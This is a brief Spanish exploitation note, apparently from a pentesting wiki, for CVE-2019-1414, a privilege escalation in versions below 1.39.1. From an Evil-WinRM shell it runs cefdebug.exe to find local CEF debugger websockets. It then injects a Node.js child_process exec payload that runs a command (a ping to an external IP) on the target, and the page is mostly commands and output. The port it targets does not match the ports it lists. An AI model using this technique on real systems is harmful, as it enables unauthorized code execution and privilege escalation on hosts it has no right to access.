CVE-2019-1414

Escalada de privilegios que afecta a versiones inferiores a la 1.39.1

Explotación

Conexión al websocket con cefdebug

*Evil-WinRM* PS C:\Temp> .\cefdebug.exe
cefdebug.exe : [2023/01/25 05:13:10:6860] U: There are 5 tcp sockets in state listen.
    + CategoryInfo          : NotSpecified: ([2023/01/25 05:...n state listen.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
[2023/01/25 05:13:30:7151] U: There were 3 servers that appear to be CEF debuggers.
[2023/01/25 05:13:30:7161] U: ws://127.0.0.1:4817/f1524df6-449c-467e-9618-e1809fd82f16
[2023/01/25 05:13:30:7161] U: ws://127.0.0.1:53876/1bfb6cf5-7bdc-465b-9e37-d91b2d57f23e
[2023/01/25 05:13:30:7171] U: ws://127.0.0.1:45345/7ed4cd69-c8dc-4c0c-8cab-0136415eff19

*Evil-WinRM* PS C:\Temp> .\cefdebug.exe --url "ws://127.0.0.1:25684/45d6f118-eab6-42c5-88e3-ef39fbbdef09" --code "process.mainModule.require('child_process').exec('ping -n 1 10.10.16.6')"
cefdebug.exe : [2023/01/25 05:23:16:2435] U: >>> process.mainModule.require('child_process').exec('ping -n 1 10.10.16.6')
    + CategoryInfo          : NotSpecified: ([2023/01/25 05:... 1 10.10.16.6'):String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
[2023/01/25 05:23:16:2435] U: <<< ChildProcess

PreviousCVE-2017-0199 NextCVE-2021-42287

Last updated 10 months ago